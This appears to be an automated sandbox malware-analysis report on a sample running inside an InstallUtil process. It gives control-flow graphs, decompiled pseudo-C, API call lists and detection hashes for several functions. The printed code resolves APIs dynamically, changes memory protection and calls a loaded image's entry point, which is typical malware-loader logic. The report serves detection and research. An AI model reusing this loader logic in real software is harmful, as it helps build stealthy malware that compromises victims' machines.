                                                            control_flow_graph 150 401a98-401aaf 151 401ab1-401ab7 150->151 152 401ab9 150->152 153 401abf-401aec call 401e35 call 401479 151->153 152->153 158 401b47-401b49 153->158 159 401aee-401b13 lstrlenW call 401b52 153->159 160 401b4a-401b4b ExitThread 158->160 163 401b15-401b27 159->163 164 401b3c-401b40 call 4011c1 159->164 165 401b36-401b38 163->165 166 401b29-401b34 call 401fac 163->166 169 401b45 164->169 165->164 166->164 169->160
                                                            C-Code - Quality: 100%
                                                            			E00401A98() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x403184;
				if( *0x40316c > 5) {
					_t16 = _t15 + 0x4040f9;
				} else {
					_t16 = _t15 + 0x4040b1;
				}
				E00401E35(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E00401479( &_v32,  &_v16,  *0x403180 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x403178);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E00401B52(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t40 =  *0x403178;
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x403178 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E00401FAC(_t45, _t40, _t32 + 4);
						}
					}
					_t25 = E004011C1(_v28); // executed
				}
				ExitThread(_t25);
			}















                                                            0x00401a9e
                                                            0x00401aaf
                                                            0x00401ab9
                                                            0x00401ab1
                                                            0x00401ab1
                                                            0x00401ab1
                                                            0x00401ac0
                                                            0x00401ac9
                                                            0x00401ace
                                                            0x00401aec
                                                            0x00401b49
                                                            0x00401aee
                                                            0x00401af4
                                                            0x00401afa
                                                            0x00401b08
                                                            0x00401b0c
                                                            0x00401b13
                                                            0x00401b15
                                                            0x00401b1b
                                                            0x00401b1f
                                                            0x00401b27
                                                            0x00401b38
                                                            0x00401b29
                                                            0x00401b2f
                                                            0x00401b2f
                                                            0x00401b27
                                                            0x00401b40
                                                            0x00401b40
                                                            0x00401b4b

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: ExitThreadlstrlen
                                                            • String ID:
                                                            • API String ID: 2636182767-0
                                                            • Opcode ID: 02c2250341f6d03a27af8a08f07ccbf7dfa604ab44a28f084247d4b31e8d20fe
                                                            • Instruction ID: 14069ec6a0d4c6b1db03676319b93d70d9afb0d21d5a2f796d034618d778d09c
                                                            • Opcode Fuzzy Hash: 02c2250341f6d03a27af8a08f07ccbf7dfa604ab44a28f084247d4b31e8d20fe
                                                            • Instruction Fuzzy Hash: 6611BE71504201ABE711DFA5CD49E5777ECAB48304F04453BB641F72B1EB38EA058B5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401E35 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            C-Code - Quality: 37%
                                                            			E00401E35(void* __eax, intOrPtr _a4) {

				 *0x403190 =  *0x403190 & 0x00000000;
				_push(0);
				_push(0x40318c);
				_push(1);
				_push(_a4);
				 *0x403188 = 0xc; // executed
				L004013FA(); // executed
				return __eax;
			}



                                                            0x00401e35
                                                            0x00401e3c
                                                            0x00401e3e
                                                            0x00401e43
                                                            0x00401e45
                                                            0x00401e49
                                                            0x00401e53
                                                            0x00401e58

                                                            APIs
                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401AC5,00000001,0040318C,00000000), ref: 00401E53
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: DescriptorSecurity$ConvertString
                                                            • String ID:
                                                            • API String ID: 3907675253-0
                                                            • Opcode ID: b5b617994087af0d0ea66c4f0b84e660e0c61463ba07f072955e03b395522a9a
                                                            • Instruction ID: c63cd9b430faf93bbeedc2284bbc4f3b30bcb02564c30e5c94284cdbba91c459
                                                            • Opcode Fuzzy Hash: b5b617994087af0d0ea66c4f0b84e660e0c61463ba07f072955e03b395522a9a
                                                            • Instruction Fuzzy Hash: E1C04C74140300B6F6109F409D4AF057E55B75870AF60052EBA04391E1C3F95155952D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004011C1 Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 176 4011c1-4011ff call 4012d3 179 401201-40120f call 40113c 176->179 180 40125b-40125d 176->180 184 401211-401220 call 401ea1 179->184 185 401247-401259 call 401265 179->185 182 40125e-401264 180->182 184->185 189 401222-401225 call 40105a 184->189 185->182 193 40122a-40122e 189->193 193->185 195 401230-40123d 193->195 195->185 197 40123f-401245 GetLastError 195->197 197->185
                                                            C-Code - Quality: 86%
                                                            			E004011C1(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x403180;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45);
				_t18 = E004012D3( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E0040113C(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E00401EA1(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E0040105A(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E00401265(_t42);
					L8:
					return _t29;
				}
			}














                                                            0x004011c9
                                                            0x004011cb
                                                            0x004011e7
                                                            0x004011f8
                                                            0x004011ff
                                                            0x0040125d
                                                            0x00000000
                                                            0x00401201
                                                            0x00401201
                                                            0x0040120b
                                                            0x0040120f
                                                            0x00401214
                                                            0x00401217
                                                            0x0040121c
                                                            0x00401220
                                                            0x00401225
                                                            0x0040122a
                                                            0x0040122e
                                                            0x00401233
                                                            0x00401234
                                                            0x00401238
                                                            0x0040123d
                                                            0x00401245
                                                            0x00401245
                                                            0x0040123d
                                                            0x0040122e
                                                            0x00401220
                                                            0x00401247
                                                            0x00401250
                                                            0x00401254
                                                            0x0040125e
                                                            0x00401264
                                                            0x00401264

                                                            APIs
                                                              • Part of subcall function 004012D3: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,004011FD,?,?,?,?,?,00000002,?,?), ref: 004012F7
                                                              • Part of subcall function 004012D3: GetProcAddress.KERNEL32(00000000,?), ref: 00401319
                                                              • Part of subcall function 004012D3: GetProcAddress.KERNEL32(00000000,?), ref: 0040132F
                                                              • Part of subcall function 004012D3: GetProcAddress.KERNEL32(00000000,?), ref: 00401345
                                                              • Part of subcall function 004012D3: GetProcAddress.KERNEL32(00000000,?), ref: 0040135B
                                                              • Part of subcall function 004012D3: GetProcAddress.KERNEL32(00000000,?), ref: 00401371
                                                              • Part of subcall function 00401EA1: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401ED9
                                                              • Part of subcall function 0040105A: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401093
                                                              • Part of subcall function 0040105A: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401108
                                                              • Part of subcall function 0040105A: GetLastError.KERNEL32 ref: 0040110E
                                                            • GetLastError.KERNEL32(?,?), ref: 0040123F
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                                                            • String ID:
                                                            • API String ID: 3135819546-0
                                                            • Opcode ID: a638a532b57f06340b17208a2ea5240cace7122cc206e8ca70d164770d418078
                                                            • Instruction ID: 2b549204dcde533aa1ddfd6f33501cb63817433826d10048fe320036ebb960fa
                                                            • Opcode Fuzzy Hash: a638a532b57f06340b17208a2ea5240cace7122cc206e8ca70d164770d418078
                                                            • Instruction Fuzzy Hash: 9711CB36600705ABD721AB95CC80DAB77BCAF89318704017EEA02F7691DB75ED068794
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 00401400 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 198 401400-40141c CreateEventA 199 401472-401473 GetLastError 198->199 200 40141e-401426 GetVersion 198->200 201 401433 200->201 202 401428-40142f 200->202 204 401435-401460 GetCurrentProcessId OpenProcess 201->204 205 40146d-401471 201->205 203 401431 202->203 202->204 203->201 206 401462 204->206 207 401469-40146c 204->207 206->207
                                                            C-Code - Quality: 100%
                                                            			E00401400() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x403170;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40317c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x40316c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x403168 = _t5;
						 *0x403170 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x403164 = _t6;
						if(_t6 == 0) {
							 *0x403164 =  *0x403164 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                                            0x00401401
                                                            0x0040140f
                                                            0x00401415
                                                            0x0040141c
                                                            0x00401473
                                                            0x00401473
                                                            0x0040141e
                                                            0x00401426
                                                            0x00401433
                                                            0x00401433
                                                            0x0040146f
                                                            0x00401471
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00401428
                                                            0x0040142f
                                                            0x00401435
                                                            0x00401435
                                                            0x0040143a
                                                            0x00401448
                                                            0x0040144d
                                                            0x00401453
                                                            0x00401459
                                                            0x00401460
                                                            0x00401462
                                                            0x00401462
                                                            0x0040146c
                                                            0x00401431
                                                            0x00401431
                                                            0x00000000
                                                            0x00401431
                                                            0x0040142f

                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004015CC), ref: 0040140F
                                                            • GetVersion.KERNEL32 ref: 0040141E
                                                            • GetCurrentProcessId.KERNEL32 ref: 0040143A
                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401453
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: Process$CreateCurrentEventOpenVersion
                                                            • String ID:
                                                            • API String ID: 845504543-0
                                                            • Opcode ID: 7a3fd3bc2feab416e398d136e547c0e7dcbd23d15830545ffe2416a0c629e091
                                                            • Instruction ID: dd5f4ea68d3ad7174de981b0e01852059bc69c4482632bbefd262180a3999ea5
                                                            • Opcode Fuzzy Hash: 7a3fd3bc2feab416e398d136e547c0e7dcbd23d15830545ffe2416a0c629e091
                                                            • Instruction Fuzzy Hash: 41F03C306803119BE7205F78BF19B563F68A709712F440036E651FA2F0D7B48A42CB4C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%